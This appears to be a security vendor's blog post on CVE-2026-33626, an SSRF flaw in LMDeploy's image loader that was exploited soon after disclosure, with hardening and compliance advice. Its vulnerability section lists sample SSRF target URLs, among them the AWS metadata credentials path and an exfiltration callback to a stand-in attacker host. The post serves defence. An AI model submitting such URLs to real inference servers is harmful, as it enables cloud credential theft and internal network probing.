LMDeploy CVE-2026-33626: Your AI Inference Stack Is the Next Attack Surface

On April 22, 2026, attackers exploited a server-side request forgery vulnerability in LMDeploy within roughly 12 hours of public disclosure. The flaw turned a vision-language image loader into a generic SSRF primitive that probed AWS metadata, Redis, and MySQL on the model host. Here is what happened, why AI inference servers are uniquely exposed, and how to harden yours.

12 min read·

TL;DR

Key Point Summary
What happened A server-side request forgery (SSRF) vulnerability in LMDeploy was exploited in the wild within ~12 hours of public disclosure
CVE CVE-2026-33626, CVSS 7.5
Affected versions All LMDeploy versions prior to 0.12.3
Vulnerable function load_image() in lmdeploy/vl/utils.py — fetches arbitrary URLs without validating internal or private IP addresses
First exploitation Detected by Sysdig honeypots on April 22, 2026 at 03:35 UTC, originating from IP 103.116.72.119
What attackers did Used the image loader as a generic HTTP SSRF primitive to scan the AWS Instance Metadata Service (IMDS), Redis (6379), MySQL (3306), and internal HTTP admin interfaces
The real prize IAM credentials from AWS IMDS — vision LLM nodes typically run on GPU instances with broad IAM roles attached
Action Timeline
Upgrade LMDeploy to 0.12.3+ on every model server Immediately
Enforce IMDSv2 with hop-limit 1 on every GPU instance This week
Audit the IAM role attached to each inference node This week
Egress-restrict model servers; deny outbound to private IP ranges and metadata endpoints This sprint

If you serve an open-source LLM in production with LMDeploy, vLLM, TGI, or any framework that loads remote images for vision models, treat AI inference nodes as a first-class attack surface. The same SSRF pattern that compromised LMDeploy honeypots will surface in adjacent projects. The fastest containment is IMDSv2 plus an egress firewall, not waiting for the next CVE.


What Is LMDeploy?

LMDeploy is an open-source toolkit for compressing, deploying, and serving large language models. Maintained as part of the InternLM project, it supports inference for both text and vision-language models (VLMs) such as InternVL and InternLM-XComposer. Engineering teams use it to self-host open-weight models on GPU infrastructure, often as an alternative to managed inference services.

Like other inference servers — vLLM, Text Generation Inference, Ollama — LMDeploy exposes an HTTP API that accepts prompts and returns model output. For vision-language models, that API also accepts image inputs, which can be supplied as a URL.

That image loader is where the vulnerability lives.

The Vulnerability: A Familiar SSRF Pattern in a New Place

CVE-2026-33626 is a server-side request forgery (SSRF) flaw in LMDeploy's load_image() function in lmdeploy/vl/utils.py. When the API receives a request with an image URL, the server fetches that URL on behalf of the user. The bug: it does not validate that the URL points to an external resource. It will happily fetch:

  • http://169.254.169.254/latest/meta-data/iam/security-credentials/ — the AWS Instance Metadata Service (IMDS)
  • http://localhost:6379/ — a Redis instance bound to the loopback interface
  • http://10.0.0.5:8080/admin — internal admin endpoints on the same VPC
  • http://attacker.example.com/callback?token=... — out-of-band exfiltration

The bug pattern is well known. Application security teams have been hunting it in web apps for over a decade. It is now showing up in AI infrastructure code that, in many cases, was written by ML engineers without a security review.

The CVSS score is 7.5, but the score understates the impact. SSRF in a vanilla web app is bad. SSRF on a GPU-hosted inference node is worse, for a reason we will get to.

Timeline: 13 Hours From Disclosure to Exploitation

  • April 21, 2026 (~15:04 UTC): Public advisory published on GitHub for LMDeploy CVE-2026-33626
  • April 22, 2026 at 03:35 UTC: Sysdig honeypots detect the first exploitation attempt, 12 hours and 31 minutes after disclosure (per Sysdig's research note; some reporting rounds this to 13 hours)
  • The attacker (originating from IP 103.116.72.119) ran a single eight-minute session of 10 distinct requests across three phases
  • Phase 1: Probes against AWS IMDS at 169.254.169.254 to attempt to extract IAM credentials
  • Phase 2: Port scans of 127.0.0.1:6379 (Redis), 127.0.0.1:3306 (MySQL), and ports 80 and 8080 for HTTP admin interfaces
  • Phase 3: Out-of-band DNS exfiltration to confirm blind SSRF behavior
  • Across the session: requests varied the model parameter between vision-language models (internlm-xcomposer2, OpenGVLab/InternVL2-8B). Sysdig observed this rotation; whether it was a deliberate evasion technique or an artifact of the tooling is not confirmed

The 13-hour window is consistent with what we now expect from automated exploitation infrastructure. Attackers monitor public advisory feeds, generate working exploits with the help of LLMs, and run them against internet-exposed instances within a single business day.

Why AI Inference Servers Are Uniquely Exposed

A textbook SSRF is bad on any server. SSRF on a GPU-hosted inference node is materially worse. Three factors make AI inference infrastructure uniquely exposed.

GPU instances tend to have broad IAM roles

GPU instances are expensive. To justify the cost, teams often consolidate workloads on them. The instance fetches model weights from S3, writes inference logs to CloudWatch, pulls configuration from Parameter Store, and may write outputs to a shared object store. The IAM role attached to the instance accumulates broad permissions, often more than any individual workload needs.

When an attacker exfiltrates that IAM role through SSRF, they inherit all of those permissions. One IMDS fetch can compromise the entire AWS account.

IMDSv1 is still common

IMDSv2, which requires a session token and supports hop-limit restrictions to defeat SSRF, has been available since 2019. AWS has been pushing customers to migrate for years. Despite this, plenty of GPU AMIs and Terraform modules still default to IMDSv1.

If your inference nodes still expose IMDSv1, an SSRF in any process running on the node hands the attacker a working session in seconds. There is no MFA, no key rotation, no audit hook. The metadata endpoint just answers.

Inference servers are designed to make outbound HTTP requests

A traditional web app rarely needs to fetch arbitrary URLs from user input. An inference server with vision-language support is designed to fetch URLs. Image loading, weight pulling from Hugging Face, fetching reference documents for retrieval-augmented generation — all of these involve outbound HTTP from the model host.

This makes egress restriction harder. You cannot simply block all outbound HTTP from the inference node, because the inference node legitimately makes outbound HTTP requests as part of normal operation. Egress filtering has to be precise: deny private IP ranges and metadata endpoints, allow specific external domains.

How This Connects to the Rest of the AI Security Picture

We have written extensively about AI agent security, MCP attack vectors, and the enterprise AI security stack. LMDeploy CVE-2026-33626 sits in a layer of the stack that often gets less attention: the inference infrastructure itself.

A complete AI security picture covers four layers, from the prompt down:

  1. The prompt and the model output — prompt injection, jailbreaks, hallucinated tool calls
  2. The agent and tool use layer — overprivileged tools, untrusted data triggering actions, MCP-specific risks
  3. The application that wraps the model — auth, multi-tenancy, output validation
  4. The inference server itself — the focus of CVE-2026-33626

Most teams have controls at layers 1 through 3. Layer 4, the model server itself, is often deployed with default settings on a GPU instance with a broad IAM role. LMDeploy made the cost of that decision visible.

If you are running open-source AI agents, the same exposure applies whenever the agent host has its own IAM role and exposes an HTTP API.

What to Do Right Now

1. Upgrade LMDeploy

Upgrade every LMDeploy deployment to 0.12.3 or newer. Track this as a security patch with the same rigor as a CVE in your web framework — because functionally, that is what it is.

If you cannot upgrade immediately, mitigate by:

  • Restricting which URLs the API will accept (allowlist of trusted hosts only)
  • Putting the inference server behind a strict egress proxy that rejects private IP ranges
  • Disabling vision-language endpoints if you do not use them

2. Enforce IMDSv2 with hop-limit 1

This is the single highest-value change you can make today, and it applies to every workload on every cloud GPU instance, not only AI inference.

On AWS:

Bash
aws ec2 modify-instance-metadata-options \
  --instance-id i-xxxxxxxxxxxxxxxxx \
  --http-tokens required \
  --http-put-response-hop-limit 1 \
  --http-endpoint enabled

For new instances, set the same options in your launch template or Terraform module. We covered the broader cloud baseline in our CIS Benchmarks for AWS guide. The same principle applies on Azure and GCP: GPU instances should not run with permissive metadata defaults.

3. Re-scope the IAM role on each inference node

Most GPU IAM roles are broader than they need to be. Walk through what the inference workload actually needs. In most cases:

  • Read access to the specific S3 bucket holding the model weights (not all of S3)
  • Write access to the specific CloudWatch log group for that workload (not full CloudWatch)
  • No SSM, no Parameter Store, no IAM, no STS

If the role currently has *:* resource patterns, anything an SSRF can reach is in scope. Tighten before the next CVE.

4. Egress-restrict model servers

The minimum egress policy for an inference server:

  • Deny outbound to all RFC 1918 private IP ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) except for explicit internal services that must be reached
  • Deny outbound to link-local addresses (169.254.0.0/16), which includes the metadata service
  • Allow outbound only to specific external domains (Hugging Face, your model artifact store, your logging endpoint)

This control alone would have stopped the LMDeploy exploitation attempt that Sysdig observed.

5. Add detection for the SSRF pattern

If you have a SIEM or runtime detection, build alerts for:

  • Outbound HTTP requests from inference nodes to 169.254.169.254
  • Outbound HTTP requests from inference nodes to private IP ranges that are not on the allow-list
  • Unexpected DNS queries from inference nodes to attacker-controlled domains
  • IAM role usage from unexpected source IPs

Sysdig and other CSPM/CWPP tools can catch this pattern. So can simple VPC flow log analysis if you do not have a runtime tool yet.

What This Means for Your Compliance Posture

If you are pursuing SOC 2, ISO 27001, or ISO 42001, AI inference infrastructure is now firmly in scope.

Specific controls auditors will ask about:

  • CC6.1 (logical access security): how are you scoping IAM roles on inference nodes? Are credentials least-privilege?
  • CC6.6 (boundary protection): how do you protect against threats from outside the system boundary? Is egress restricted from inference nodes? Is the metadata service reachable from user-influenced HTTP fetches?
  • CC7.1 (vulnerability management): how do you track CVEs in AI infrastructure components like LMDeploy, vLLM, and TGI? What was your time-to-patch for CVE-2026-33626?
  • CC7.2 (system monitoring): do you detect anomalous outbound traffic from inference nodes?
  • A.8.16 (ISO 27001:2022, monitoring activities): same question for ISO
  • ISO 42001 Annex A controls like A.6.2.6 (AI system impact assessment) and A.8.2 (processes for responsible AI design and development): do you have documented risk and impact assessments for your inference infrastructure?

The 2026 SOC 2 audit conversation increasingly includes AI systems by default, as we covered in what changed in SOC 2 for 2026. If you are running open-source inference servers, expect questions.

The Bigger Picture

LMDeploy is not unique. The same SSRF pattern almost certainly exists in adjacent projects, including private internal forks. The economics of AI infrastructure development — fast iteration, ML engineers writing networking code, GPU costs forcing consolidation onto over-privileged instances — make the next CVE in this category likely a matter of weeks, not months.

The structural fix is to treat AI inference servers as the same kind of attack surface as a public web application:

  • Code is reviewed by security engineers
  • The host is hardened (IMDSv2, scoped IAM, egress filter)
  • CVEs are tracked, patched, and audited
  • Anomalous behavior is detected at runtime

The teams that already do this for their web stack now need to extend it one layer down, into the AI infrastructure.

Conclusion

CVE-2026-33626 is a textbook SSRF in a less-textbook place. The exploitation timeline — under 13 hours from public advisory to live exploitation — is the new normal for any vulnerability with a working proof of concept. The mitigations are not novel: upgrade, enforce IMDSv2, scope the IAM role, restrict egress, and detect the pattern. The novelty is that AI inference infrastructure now needs to be treated as production-grade attack surface, not as a research environment.

If you would like help threat modeling your AI infrastructure, scoping IAM roles on GPU workloads, or mapping these controls to a SOC 2 or ISO 27001 audit, get in touch with our team.


Sources

Share this article

Other platforms check the box

We secure the box

Get in touch and learn why hundreds of companies trust Bastion to manage their security and fast-track their compliance.

Get Started